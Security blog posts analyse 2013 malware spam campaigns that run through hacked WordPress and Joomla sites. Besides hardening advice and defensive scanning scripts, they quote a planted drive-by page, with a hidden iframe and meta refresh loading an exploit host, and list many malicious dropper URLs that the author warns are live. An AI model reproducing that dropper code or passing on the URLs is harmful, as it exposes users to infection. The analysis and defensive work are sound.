Malware attacks after the Boston bombing

Yesterday, in the wake of the bombings in Boston, I received an email that looks like this in my inbox.

The links, needless to say, do not go to CNN. Instead, they lead to

http://playhard.by/bostoncnn.html

*** WARNING *** WARNING *** WARNING ***

This site IS LIVE as of the time of writing this. It WILL attempt to infect your computer with malware. DO NOT visit this site if you don’t know what you’re doing!

playhard.by is a hacked site hosted in Belarus. The URL in the email is a link to a file planted on the site that redirects visitors, using both JavaScript and a REFRESH meta tag, to

http://sub.piecedinnerware.com/complaints/messages_shows_mentions.php

This site is hosted by an outfit called Colo Crossing, a server colocation facility headquartered in the US. The domain was registered through (wait for it…) GoDaddy:

tacit$ whois PIECEDINNERWARE.COM

Domain Name: PIECEDINNERWARE.COM
Registrar: GODADDY.COM, LLC
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS17.DOMAINCONTROL.COM
Name Server: NS18.DOMAINCONTROL.COM
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 19-nov-2012
Creation Date: 19-nov-2012
Expiration Date: 19-nov-2013

>>> Last update of whois database: Thu, 18 Apr 2013 21:42:55 UTC <<<

Registrant:
Jigar Kapadia
B-32, Mani Ratna Raw House, Opp Sai Nagar
New Gujarat Gas Road, Adajan
Surat, Gujarat 395009
India

Administrative Contact:
Kapadia, Jigar contact@NewWaysys.com
B-32, Mani Ratna Raw House, Opp Sai Nagar
New Gujarat Gas Road, Adajan
Surat, Gujarat 395009
India
+91.9076026366

Technical Contact:
Kapadia, Jigar contact@NewWaysys.com
B-32, Mani Ratna Raw House, Opp Sai Nagar
New Gujarat Gas Road, Adajan
Surat, Gujarat 395009
India
+91.9076026366

The domain was registered last November, and put into service after the Boston Marathon bombing. (Interestingly, the HTML file that redirects to this site contains the following block of text:

Be sure you have a transfer reference ID. You will be asked to enter it after we check the link. Important: Please be advised that calls to and from your wire service team may be monitored or recorded.

Redirecting to Complain details… Please wait…

This suggests that an ordinary, garden-variety malware attempt, possibly something like a fake PayPal or bank transaction notification, was hastily modified to exploit the Boston attacks.

As per usual, if you receive any emails like this, do not be tempted to click on the links in them.

I expect to start seeing similar emails targeting the explosion at the fertilizer plant in Texas within the next 24 hours.

More on the W32/Kuluoz malware attack

A short time ago, I wrote about a malware attack in which hacked sites were being used to spread the W32/Kuluoz malware. Kuluoz is a password-stealing Trojan; when it’s installed, it scans your password files for Web browsers, password wallets, and so on looking for bank, PayPal, eBay, FTP, and other sites. People infected with Kuluoz may see their bank accounts emptied, their PayPal accounts drained, and if they use FTP to manage Web sites, their Web sites may be infected with the same malware.

Since I first wrote about it, the attack has changed and grown a lot more aggressive.

I saw the first sign of this attack on November 26 of last year. At the time, the attack was still quite crude: the victim would receive an email claiming to be from FedEx (though the body copy of the email said UPS) that had a message saying a package could not be delivered, and the victim would have to click a link to print out a receipt to pick the package up.

The link, of course, went to a hacked Web site being used to spread the malware. Clicking on the link would download a copy of W32/Kuluoz.B, regardless of what kind of computer the user was using. The first infected link I saw was

http://elbosquedelaherrezuela.com/wp-content/plugins/akismet/track.php?c003

hosted on Spanish Web host Arsys. The compromised site was running an outdated copy of WordPress; it has since been pulled down by the host.

In the time between last November and this March, the attack grew more sophisticated. The emails attempting to lure marks to hacked sites got more polished, and grew to resemble actual FedEx emails quite closely. The malware downloaders placed on hacked sites changed; they now examine the browser’s “user agent,” a header that tells a Web site what kind of computer you are using. If you’re on a Mac or Linux computer, you see a bogus “404 not found” error; only if you are on a vulnerable Windows browser does the hacked site download malware. And the malware itself changed rapidly as well; VirusTotal identified the first malware as W32/Kuluoz, but later downloads, with different file sizes and MD5 hashes, are identified as W32/Kuluoz.B or W32/Kuluoz.3.


Since I wrote the report last March, the attack has ramped up significantly and changed again.

At first, in November and December, I averaged 6 emails a month trying to get me to click on links. Now I’m seeing an average of more than 15 of these emails per day.

The emails themselves have changed, too. The fake FedEx emails, though I still get them occasionally, have become quite rare. Instead, the new wave of attacks involves emails that look like American Airlines ticket confirmation emails:

Needless to say, if you get an email that looks like this, DO NOT click on the link.


Right now, there is a hack attack of unprecedented scope and tenacity going on against WordPress and Joomla sites. The attack uses tens of thousands of compromised PCs to try to log in to WordPress and Joomla sites with the username “admin” and a vast number of common passwords. The attack is so severe that some Web hosting companies are reporting that WordPress and Joomla sites on their servers are slow to respond or not loading at all.

I believe that those hack attacks are related to the W32/Kuluoz malware distribution.

I don’t have any direct proof of that. The people attacking WordPress and Joomla sites are covering their tracks well, using botnets and IP spoofing to carry out the attacks.

But the circumstantial evidence seems strong. So far, every single compromised site I’ve seen that’s hosting the Kuluoz downloaders is running WordPress or Joomla. As time has gone on, the number of infected WordPress and Joomla sites has scaled rapidly. The recent wave of emails trying to lure people to infected sites coincides with the ramping up of attacks on WordPress and Joomla sites.

None of this is incontrovertible evidence. It could be coincidence–two different organized crime gangs attacking the same kinds of sites at the same time and ramping up their efforts coincidentally. But my gut says they’re related.


One of the most frustrating parts of this problem, for me, has been how slow Web hosting companies are to respond to reports that their systems have been penetrated and they are hosting computer malware.

I’ve compiled a list of statistics about infected Web hosting companies. Since November 26, I’ve started keeping track of which Web hosting companies are affected by the attack, and how long they’ve taken to remove a malware dropper once they’ve been notified it exists.

Not all Web hosts are created equal. Here, for example, is a graph showing the number of malware infected Web sites I’ve seen on various Web hosts since November, with the Web hosts identified by Spamcop:

The worst of the worst of the lot in terms of sheer number of virus droppers hosted, by a large margin, is GoDaddy.

Now, some ISPs host more Web sites than others, so if all ISPs were equally vigilant (or equally lax) about security you would expect to see larger hosting companies hosting more viruses than smaller companies. But this graph shows that isn’t really how it goes. Hostgator is larger than most of the other hosting companies listed here, but has only a small number of malware-infected sites. Dreamhost and OVH are disproportionately represented for their size by a significant margin.


Another place where hosting companies are not created equal is in how speedily they remove malware droppers once they’re notified. The best Web hosting companies will do this within 24-48 hours, which to my mind is still quite a long time to leave a malware dropper active. When I’ve complained to Hostgator, arsys.es, and Lunarpages, for example, they’ve typically taken action quite quickly.

On the other side of the coin, some Web hosting companies take months to remove malware droppers…or don’t remove them at all.

I don’t know if it’s because they are easily fooled by the phony 404 errors or if they simply don’t care, but a number of Web hosting companies on this list appear unwilling or unable to deal with malware-infected sites at all.

The worst of these are Dreamhost (which has not removed one single malware site from its servers–every single one I’ve notified them of, without exception, is still active as of the time of writing this), GoDaddy (which used to be one of the top most responsive Web hosting companies, but no more; sites that they are notified of typically remain active on their servers for months, with one site I notified them of last December finally being taken down this April), OVH (which, like Dreamhost, appears not to deal with malware-infected sites at all), PrivateDNS.com (a site they were notified of in January is still active and spreading malware as of the time of writing this), and, sadly, Bluehost (which keeps emailing me to say the problem is resolved but the malware droppers remain active on their servers nonetheless).

Other ISPs on the Walk of Shame include 1 and 1 (which typically won’t remove a malware dropper until I’ve emailed them three or four times), Peer 1 (which has several malware droppers active for two months or more), and Calpop (which typically leaves malware droppers live for about six weeks after being notified).


Now it’s time for the practical bit.

If you have a WordPress or Joomla Web site, what can you do to keep it secure?

The two most important things you can do are to use very, very strong admin passwords and keep on top of security updates religiously. When a security update for a popular Web package is released, organized crime gangs will examine it and then roll the security holes it fixes into their automated exploit tools, because they know that most people don’t install them right away. If you don’t install a security patch within a day or two of its release, you run the risk of being pwn3d.

So, here’s a quick list of dos and don’ts to run a WordPress or Joomla site:

DO

  • Use strong passwords.
  • Install updates immediately.
  • Consider locking down your /wp-admin or Joomla admin directories with an .htaccess file that does not permit access without a password. If you don’t know how to use .htaccess files, there are some plugins that can do this for you. A WordPress plugin that can lock down your wp-admin directory is Bulletproof Security. A similar Joomla plugin is JHackGuard.
  • If you have more than one WordPress site, install InfiniteWP. This is a WordPress administration console that will notify you by email when any component of any of your WordPress sites needs to be updated, and allow you to update all your sites with one button click. It’s free.
  • If you create your own WordPress or Joomla themes, consider removing the WordPress or Joomla footers. Automated tools are used to scan for these so that the bad guys know what sites to attack.
  • Make sure you remove the /install directories when you install any CMS. (Joomla requires you to do this.)
  • Use a Web host that is proactive about security and responds quickly to abuse complaints.

DO NOT:

  • Assume you don’t have to worry about security because you have a tiny little site that nobody visits. The organized crime groups don’t care what your site is or how much traffic it gets. They use automatic tools that search through hundreds of thousands of Web sites a day searching for vulnerable sites. If you are vulnerable, you will eventually be cracked.
  • Leave your plugins or themes directories indexable. If you don’t know what that means, the easiest way to make sure you’re not indexable is to create an empty file called index.html in your plugins directory and your themes directory. This will keep people from getting a list of all the files in those directories, which they can use to search for vulnerabilities.
  • Set up a WordPress or Joomla Web site and then just walk away from it. If you are not actively maintaining it, take it down.
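The items in the list above that live on disk (leftover installer directories, listable plugin and theme directories, admin directories without HTTP authentication, directory indexes) can be audited and fixed by a script. This is an added example, not code from the original post or from WordPress, Joomla or the plugins named above; it assumes an Apache-style layout where `.htaccess` files are honoured, and the `.htpasswd` path it writes is a placeholder.

```python
import tempfile
from pathlib import Path
from typing import List, Tuple

# Directories that should never be listable; an index.html placeholder stops a
# directory listing even on servers that still have indexes switched on.
LISTABLE_DIRS = ("wp-content/plugins", "wp-content/themes",      # WordPress
                 "plugins", "templates", "components", "modules")  # Joomla
ADMIN_DIRS = ("wp-admin", "administrator")
INSTALLER_DIRS = ("install", "installation")


def audit_cms_docroot(docroot: str) -> List[str]:
    """Return a list of findings for a WordPress/Joomla document root."""
    root = Path(docroot)
    findings: List[str] = []
    for name in INSTALLER_DIRS:
        if (root / name).is_dir():
            findings.append(f"installer directory still present: {name}/")
    for rel in LISTABLE_DIRS:
        d = root / rel
        if d.is_dir() and not any((d / f).exists() for f in ("index.html", "index.php")):
            findings.append(f"listable directory (no index.html): {rel}/")
    for rel in ADMIN_DIRS:
        d = root / rel
        if d.is_dir():
            ht = d / ".htaccess"
            if not ht.is_file() or "AuthType" not in ht.read_text(errors="ignore"):
                findings.append(f"admin directory not password-protected: {rel}/")
    root_ht = root / ".htaccess"
    if not root_ht.is_file() or "-Indexes" not in root_ht.read_text(errors="ignore"):
        findings.append("directory indexes not disabled in root .htaccess")
    return findings


def harden_cms_docroot(docroot: str, htpasswd_path: str) -> None:
    """Apply the on-disk fixes the audit checks for. A leftover installer
    directory is only reported, never deleted automatically."""
    root = Path(docroot)
    for rel in LISTABLE_DIRS:
        d = root / rel
        if d.is_dir():
            (d / "index.html").touch()
    for rel in ADMIN_DIRS:
        d = root / rel
        if d.is_dir():
            (d / ".htaccess").write_text(
                "AuthType Basic\n"
                'AuthName "Administration"\n'
                f"AuthUserFile {htpasswd_path}\n"
                "Require valid-user\n")
    root_ht = root / ".htaccess"
    existing = root_ht.read_text() if root_ht.is_file() else ""
    if "-Indexes" not in existing:
        root_ht.write_text(existing + "Options -Indexes\n")


def demo(with_installer: bool = False) -> Tuple[List[str], List[str]]:
    """Build a constructed, deliberately weak WordPress layout in a temp dir,
    audit it, harden it, and audit again. Returns (before, after)."""
    base = tempfile.mkdtemp(prefix="cms-audit-")
    layout = ["wp-admin", "wp-content/plugins/akismet", "wp-content/themes/twentytwelve"]
    if with_installer:
        layout.append("installation")
    for rel in layout:
        (Path(base) / rel).mkdir(parents=True)
    before = audit_cms_docroot(base)
    harden_cms_docroot(base, "/path/to/.htpasswd")  # placeholder path
    after = audit_cms_docroot(base)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", *before, sep="\n  ")
    print("after:", after)
```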

You have a package! Surprise, it’s the W32/Kuluoz malware!

About three months ago, I got an email telling me that my FedEx package couldn’t be delivered. The body of the email told me that the UPS courier tried to deliver it, and that it would be sent back if I didn’t click on the attached link.

Naturally, as I wasn’t expecting a FedEx package, and given that FedEx presumably knows it isn’t UPS, I knew immediately that clicking the link was a Very Bad Idea…at least on an unsecured Windows box. Sure enough, clicking it downloaded a Windows executable, which VirusTotal identified as W32/Kuluoz, a backdoor command-and-control software that also attempts to download other malware.

I reported the site hosting the malware and forgot about it.

Then, things started to change.


I’ve been getting more and more copies of this email lately; I’m now averaging several a week. The silly error and grammar mistakes have been fixed, and the emails now look quite polished. Here’s an example I received a couple of days ago:

The “Print Receipt” link leads to http://www.123goplus.com/components/.wye6fb.php?receipt=831_1493393532

CAUTION *** CAUTION *** CAUTION

The links in this blog post ARE LIVE as of the time of writing this. If you attempt to visit them with a vulnerable Windows computer, they WILL try to download malware to your computer. DO NOT visit these links if you don’t know what you’re doing!

The site 123goplus.com belongs to a company that produces business cards and similar printed pieces in Montreal, Canada.

$ whois 123goplus.com

Whois Server Version 2.0

Domain Name: 123GOPLUS.COM
Registrar: GODADDY.COM, LLC
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.MTLEXPRESS.CA
Name Server: NS2.MTLEXPRESS.CA
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 06-jan-2013
Creation Date: 06-may-2006
Expiration Date: 06-may-2014

>>> Last update of whois database: Thu, 14 Mar 2013 22:32:30 UTC <<<

Registrant:
Pierino Pezzi
8630 Perra #3
Montreal, Quebec H1E5M8
Canada

Administrative Contact:
Pezzi, Pierino creationexpress@yahoo.com
8630 Perra #3
Montreal, Quebec H1E5M8
Canada
+1.5142741616

Technical Contact:
Pezzi, Pierino creationexpress@yahoo.com
8630 Perra #3
Montreal, Quebec H1E5M8
Canada
+1.5142741616

Domain servers in listed order:
NS1.MTLEXPRESS.CA
NS2.MTLEXPRESS.CA

The site 123goplus.com is running an outdated, insecure copy of the popular Joomla content management software, which has been hacked to have the malware downloader on it. (Joomla is a common target for this kind of attack. If you run Joomla on your Web site, and you don’t keep on top of security patches religiously, it’s a certainty that you will be hacked–it’s not “if,” it’s “when.”)

Here’s where things get cool.

Visiting this URL from a Mac browser or a Linux browser returns a 404 Not Found page, presumably to fool folks like me into thinking that the problem has been fixed.

Visiting the URL http://www.123goplus.com/components/.wye6fb.php without the “?receipt=831_1493393532” at the end also returns a 404 error; presumably, that code identifies a target that the email has been sent to. The 404 error looks like this:

But hang on! Let’s go to http://www.123goplus.com/fghfghghf and see what a REAL 404 error looks like on this server:

See the difference? The 404 error that you get when you go to the malware dropper is phony. The malware dropper is there, and it does live at that address.

If you visit the malware dropper with your browser user-agent set to, say, Internet Explorer 6 (God help you), you won’t see an error message. Instead, it will download a .zip file called “PostalReceipt.zip”.

I have downloaded several copies of this file from several different compromised hosts over the past couple of months, all of them from nearly identical FedEx emails.

The payload sites vary. Many different sites have been hacked and used to download this malware: 123goplus.com, yourinternationalteam.com, youknowlee.com, theqcontinuum.com, canyonlakeboatstorage.com.

In every case, the site is running an outdated, insecure copy of WordPress or Joomla. The hackers hack the site (which is trivial to do), place a PHP script that downloads the malware, then send out a bunch of these phony emails about a non-existent FedEx package, hoping to trick people into clicking the link.

Most of these sites remain infected, weeks or months after being reported to the ISPs, because either the ISPs don’t care or the ISPs aren’t paying attention to the fact that the malware scripts return phony 404 pages. (GoDaddy and OVH, I’m especially looking at you here.)

The people behind this attack are adapting the malware rapidly. I downloaded three samples of the PostalReceipt.zip file, one on January 25 and two on January 30, and they differ from one another. VirusTotal identifies the earliest one as W32/Kuluoz, the second as W32/Kuluoz.B, and the third as W32/Kuluoz.3.


There are some interesting things about this attack.

The group–and I bet it is a group–of criminals responsible for this attack are taking care to cover their tracks and to keep abuse teams from removing the malware from infected sites. Each spam email contains a code at the end of the malicious URL, and the URL returns a phony error message if it doesn’t see a valid code.

The virus downloader script is smart enough to examine the browser user-agent to see what kind of computer and what Web browser the victim is using. If it sees a browser or a computer that it can’t exploit, it returns a fake error message.

Only if it sees a vulnerable browser does it attempt to download the malware, which then surrenders the computer to the control of the hackers.

The malware droppers are installed, probably automatically, on sites running insecure WordPress or Joomla software. The phony 404 error messages slow down the Web hosting companies’ response, so the malware droppers stay active for long periods of time.

I’ve said it before, and I’ll say it again: If you run a Web site that uses a content management or blogging or ecommerce package, you *** ABSOLUTELY *** MUST *** check periodically for software updates and install them immediately. (When a software update comes out, the organized crime gangs that do this kind of attack will analyze it and figure out what security holes it patches. Within days, they will start taking over any Web site that hasn’t installed the update.)

The fact that malicious scripts will cloak themselves behind fake error messages means that you can never trust that a problem has been fixed just because you see a 404 error if you try to look at a suspicious URL.
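The two checks described above, fetching the suspect URL with different browser user-agents and comparing its 404 page with the server’s genuine 404 from a nonsense path, can be automated so an abuse desk does not take a bare 404 at face value. This is an added example, not code from the original post; the User-Agent strings are constructed, the `analyse`/`check_url` names are mine, and the HTTP fetch uses only the Python standard library.

```python
import hashlib
import urllib.error
import urllib.request
from typing import Dict, List, Tuple

# Constructed User-Agent strings: the old Windows IE string is the kind of client
# the dropper serves its archive to; Mac and Linux browsers get the phony 404.
USER_AGENTS = {
    "ie6_windows": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    "safari_mac": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8) AppleWebKit/536.26 Safari/536.26",
    "firefox_linux": "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0",
}

Response = Tuple[int, bytes]  # (HTTP status, response body)


def fetch(url: str, user_agent: str, timeout: float = 15.0) -> Response:
    """Fetch url with a given User-Agent. HTTP error responses (404 and so on)
    are returned rather than raised, because the error body is what we compare."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def fingerprint(body: bytes) -> str:
    """Short SHA-256 prefix: enough to tell two pages apart without keeping them."""
    return hashlib.sha256(body).hexdigest()[:16]


def analyse(suspect: Dict[str, Response], genuine_404: Response) -> dict:
    """Compare the suspect URL's responses across User-Agents, and compare every
    404 it returned with the server's genuine 404 page (fetched separately from
    a random, non-existent path on the same host)."""
    fps = {ua: (status, fingerprint(body)) for ua, (status, body) in suspect.items()}
    genuine_fp = fingerprint(genuine_404[1])
    served_to: List[str] = [ua for ua, (status, _) in fps.items() if status == 200]
    fake_404_for: List[str] = [ua for ua, (status, fp) in fps.items()
                               if status == 404 and fp != genuine_fp]
    ua_dependent = len(set(fps.values())) > 1
    if ua_dependent:
        verdict = "cloaked"        # different clients see different things
    elif fake_404_for:
        verdict = "fake_404"       # everyone gets a 404, but not the server's own
    else:
        verdict = "consistent"
    return {"verdict": verdict, "ua_dependent": ua_dependent,
            "served_content_to": served_to, "fake_404_for": fake_404_for,
            "per_ua": fps}


def check_url(suspect_url: str, control_url: str) -> dict:
    """Live version: control_url should be a made-up path on the same host,
    so its response is the server's real 404 page."""
    suspect = {name: fetch(suspect_url, ua) for name, ua in USER_AGENTS.items()}
    return analyse(suspect, fetch(control_url, USER_AGENTS["safari_mac"]))


if __name__ == "__main__":
    import sys
    print(check_url(sys.argv[1], sys.argv[2]))
```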

Computer Security: Enormous Twitter Attack

A while ago, I received a spam email. The email came from an obviously hacked account, and contained nothing but a Web URL.

This usually means either a phony pharmacy spam or a computer virus. Since I am interested in these things, and since I keep virtual machines with redundant backups so I’m not too concerned about malware, I followed it. It led to a GoDaddy site which redirected to a PHP redirection script living on a hacked Web site which led in turn to a fake antivirus page–a page that throws up a phony virus “warning” and prompts the mark to download an antivirus program to “fix” the problem. The supposed “antivirus program” is, of course, actually malware. Pretty run-of-the-mill stuff. I reported it to the Web hosts and moved on.

Then, a few days later, I started seeing Twitter posts that were just a URL. These posts led to a hacked site…which led to the same redirector, which then led on to the same malware sites.

Then I started seeing more. And more and more and more. And still more.

I did a Google search. Just one of the hacked sites, an Indian site called cowmamilk.com, had over 257 **MILLION** mentions on Twitter, which some quick investigating shows were coming from at least 500,000 Twitter accounts that were being used to blast the URL far and wide. 257 million searchable mentions for just a single attack URL!

This is a huge scale attack, flooding Twitter with hundreds of millions of mentions of hacked Web sites that in turn redirect to a traffic handler which then sends visitors on to computer malware.

I did some more investigating, mapping out the patterns of redirections, visiting the sites again and again with my browser user agent set in different ways, watching what happened. After a while, I was able to build a map of the attack, which looks something like this:

And I found some really interesting things.

More technical details, as well as screen shots of the malware sites, under this cut. If you’re interested, clicky here!

Another day, another massive Dreamhost hack attack

A few months back, I wrote about a WordPress attack that affected a friend of mine. The hack was aimed at WordPress installs, and planted very subtle modifications to core WordPress files that redirected users to spam pharmacy sites.

At first, I thought the attack was aimed at unpatched WordPress sites, though my friend’s site was fully patched and updated. As I pursued the patch, I started noticing that a highly disproportionate number of the hacked sites were hosted on the same Web hosting provider my friend’s site lived on: namely, Dreamhost.

Dreamhost, as I observed later, seemed to be hosting quite a number of these hacked sites. And more worrying, the sites were generally fully patched, suggesting some sort of zero-day exploit against Dreamhost’s Web hosting servers.

I made note of it, fired off some emails to Dreamhost’s abuse team, and forgot about it.

Fast forward to today.

Today, I received a number of spam emails that used redirectors planted on hacked sites to redirect to a spam pharmacy page selling fake Viagra. More concerning, the site appeared to be attempting an exploit to download malware. It’s an exploit I’ve seen before, often used to distribute the W32/ZeuS banking Trojan.

In the spam messages I received, the redirect file had the same name: “jbggle.html”. So, curious, I did a Google search for sites with this filename in the URL and discovered quite a large number of hacked sites that redirect to the same spam pharmacy page:

http://cottinghamhuntingclub.com/images/fbfiles/avatars/gallery/jbggle.html
http://www.hesslerdesign.com/clients/alkarsteel.com/images/navigation/jbggle.html
http://theaquilareport.com/images/fbfiles/avatars/gallery/jbggle.html
http://view.ghava.org/cache/Inspiration/Moving_imagery/Stop_frame_animation/Kristofer_Strom/jbggle.html
http://ketchup-mustard.com/sketchbooks/jbggle.html
http://irenderer.com/photo/data/seasonal/1171063984/jbggle.html
http://hisdoulos.com/media/wpmu/uploads/blogs.dir/3/files/jbggle.html
http://bahiarestaurant.net/administrator/components/jbggle.html
http://www.mcc-studio.org/components/com_flexicontent/librairies/phpthumb/cache/source/jbggle.html

*** WARNING *** WARNING *** WARNING ***

All these URLs are live as of the time of this writing. All of them will redirect you to a spam pharmacy Web site which may also attempt to download malware on your server.

And interestingly, ALL of these Web sites are hosted by Dreamhost. Every. Single. One.

I strongly recommend that people steer well clear of Dreamhost. I have not seen this level of compromised Web sites on a single server since the zero-day exploit against iPower Web several years ago.

Dreamhost’s security team seems unwilling or unable to deal with this problem, which is quite disappointing for a large, mainstream Web hosting company.

Edited to add: Within minutes of this blog post going live, I received an email from Dreamhost’s security team that they had started examining the sites on their servers to remove these redirectors. It is not clear from the email whether or not they have identified the exploit being used to plant them, or indeed intend to do so.

Computer Malware in 4 seconds

One of my email inboxes lately has been flooded with spam for phony “Canadian pharmacy” sites (does anyone actually believe that scam? Seriously?) And when I say “flooded,” I mean “50-60 a day or so.”

These spam messages come in two varieties. One is standard straight-ahead spam: an image, sometimes in the email and sometimes loaded remotely from the spam site, that advertises cheap prices on Viagra, and a Web link to the spam pharmacy site itself.

The other variety is different. It’s invariably a message claiming to be a bounced email notification, a greeting card notification, or something along those lines, with an attached HTML file. The HTML file, if it is opened, redirects to some poor schmuck’s hacked Web site, where it displays the message

“Please, waiting….. 4 seconds”

Then after 4 seconds, it redirects to the same spam pharmacy sites as the first variety.

“Well, hmm,” I thought to myself, “that’s odd. Why is the redirector waiting for four seconds?”

So I looked at some of the redirector pages, and the answer seems to be “Because the spammers are now shitting where they eat.”


Spammers have used computer viruses and malware for years. That’s nothing new. Most computer spam is sent through home Windows PCs that have been infected by viruses. The viruses install back-door remote control software and email server software on the infected PC; the spammers then take over the infected PC, without the owner knowing, and use it to send spam.

But generally speaking, in the past the spammers have not tried to use their fake pharmacy sites to spread malware. They have preferred to keep the malware and the phony medicine separate; they spread malware through one set of sites, and sell fake prescription meds through another.

Not any more.

The new system attempts to download computer malware onto the computers of people who respond to the spam. Here’s how it works:

Step 1: The spammers hack a poorly secured Web site. Often, these are Web sites run by very small companies, using outdated ecommerce software without security patches. I’ve also seen a whole bunch of these sites hosted on GoDaddy and The Planet; I don’t know if these ISPs are directly being attacked, but they seem to be hosting the bulk of the hacked sites.

Step 2: A file named “index3.html” is placed on the hacked Web site. This file looks like this:

PLEASE, WAITING…. 4 sec

<meta http-equiv="refresh" content="4;url=http://knewname.com" />

<iframe src='http://panlip.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe><br>

Step 3: A spam email is created. The spam email has an attached HTML file that looks like this:

<meta http-equiv="refresh" content="0;url=http://designcomforttx.com/index3.html" />

*** WARNING *** WARNING *** WARNING ***
The URLs above and elsewhere in this post are live as of the time of this writing. They WILL attempt to download malware in an iFrame before redirecting to a spam pharmacy site. DO NOT attempt to visit these URLs if you don’t know what you’re doing!

Anyone who opens the HTML file attached to the spam email visits the hacked site, in this case designcomforttx.com. They stay on that site for 4 seconds while a hidden iFrame attempts to download a file from another site, in this case the Russian site panlip.ru, hosted by Tata Communications in India. After 4 seconds, the mark is redirected to a run-of-the-mill Badcow fake “Canadian” pharmacy page, in this case knewname.com, hosted in China.
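A scanner for the two HTML artefacts in this chain (the attachment’s instant meta refresh and the planted index3.html with its timed refresh plus 1×1 hidden iframe), which also picks up script-based redirects like the playhard.by file discussed at the top of this page that used both JavaScript and a REFRESH meta tag. This is an added example, not code from the original post; the `RedirectScanner`/`scan_html` names are mine and the sample documents are constructed with placeholder hostnames in the shape of the files shown above.

```python
import re
from html.parser import HTMLParser
from typing import List, Tuple

META_REFRESH_RE = re.compile(r"\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)", re.I)
JS_REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]"
    r"|location\.(?:replace|assign)\(\s*['\"]([^'\"]+)['\"]", re.I)


class RedirectScanner(HTMLParser):
    """Collects meta-refresh targets, hidden iframes and script redirects."""

    def __init__(self) -> None:
        super().__init__()
        self.meta_refresh: List[Tuple[int, str]] = []   # (delay in seconds, url)
        self.hidden_iframes: List[str] = []
        self.js_redirects: List[str] = []
        self._script: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_REFRESH_RE.match(a.get("content", ""))
            if m:
                self.meta_refresh.append((int(m.group(1)), m.group(2)))
        elif tag == "iframe" and self._is_hidden(a):
            self.hidden_iframes.append(a.get("src", ""))
        elif tag == "script":
            self._in_script = True

    def handle_data(self, data):
        if self._in_script:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            for m in JS_REDIRECT_RE.finditer("".join(self._script)):
                self.js_redirects.append(m.group(1) or m.group(2))
            self._script = []

    @staticmethod
    def _is_hidden(a) -> bool:
        # 1x1 / 0x0 frames and frames styled invisible are the drive-by pattern.
        style = a.get("style", "").replace(" ", "").lower()
        tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
        return tiny or "visibility:hidden" in style or "display:none" in style


def scan_html(html: str) -> dict:
    p = RedirectScanner()
    p.feed(html)
    p.close()
    reasons = [f"hidden iframe loads {src}" for src in p.hidden_iframes]
    reasons += [f"script redirects to {u}" for u in p.js_redirects]
    reasons += [f"meta refresh after {d}s to {u}" for d, u in p.meta_refresh]
    # A hidden iframe, or two redirect mechanisms stacked (script plus meta
    # refresh), is the pattern worth escalating; a lone meta refresh is common.
    suspicious = bool(p.hidden_iframes) or (bool(p.js_redirects) and bool(p.meta_refresh))
    return {"meta_refresh": p.meta_refresh, "hidden_iframes": p.hidden_iframes,
            "js_redirects": p.js_redirects, "reasons": reasons, "suspicious": suspicious}


# Constructed samples in the shape of the two files described above; the
# hostnames are placeholders, not the real ones.
ATTACHMENT_HTML = '<meta http-equiv="refresh" content="0;url=http://hacked-site.example/index3.html" />'
INDEX3_HTML = """PLEASE, WAITING.... 4 sec
<meta http-equiv="refresh" content="4;url=http://pharmacy.example" />
<iframe src='http://attack-host.example:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe><br>
"""

if __name__ == "__main__":
    for name, doc in (("attachment", ATTACHMENT_HTML), ("index3.html", INDEX3_HTML)):
        r = scan_html(doc)
        print(name, "SUSPICIOUS" if r["suspicious"] else "plain redirect", r["reasons"])
```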


I have not been able to determine what the iFrame does. On my machine, it downloads blank content. I’ve Googled some of the domains being used in these iFrames (there are several different domains being used in the attacks); some people have claimed that the attack domains examine the user’s browser, then attempt to download a PDF exploit or some other browser exploit if they detect a vulnerable browser configuration.


I’m seeing LOTS of these hacked Web sites, always with a file named “index3.html” and always with a hidden iFrame. The index3.html file always redirects to knewname.com but may first load the iFrame from one of many different sites.

A partial list of hacked sites, some of which are still active at the time of this writing and some of which are not, includes:

designcomforttx.com/index3.html
arenafence.ca/index3.html
powerchurchsoftware.com/index3.html
ektalimoservice.com/index3.html
madeinperu.net/index3.html
whitakermedical.com/index3.html
shaolinmonk.net/index3.html
eyesensations.com/index3.html
trendzmarket.com/index3.html
identigen.com/index3.html
yasetai.com/index3.html
highlandparkbuilders.com/index3.html
retreatsatstonefountain.com/index3.html
3iconstruction.com/index3.html

In each case, the “index3.html” file is virtually identical, with the only difference being the server it attempts to load the iFrame from. Attack domains I have seen used in the iFrames include:

http://panlip.ru:8080/index.php?pid=10
http://sheepbody.com:8080/index.php?pid=10
http://cafemack.com:8080/index.php?pid=10

whois panlip.ru

% By submitting a query to RIPN’s Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain: PANLIP.RU
nserver: ns1.dnsofthost.com.
nserver: ns2.dnsofthost.com.
nserver: ns3.dnsofthost.com.
nserver: ns4.dnsofthost.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 472 2311731
e-mail: tips@freenetbox.ru
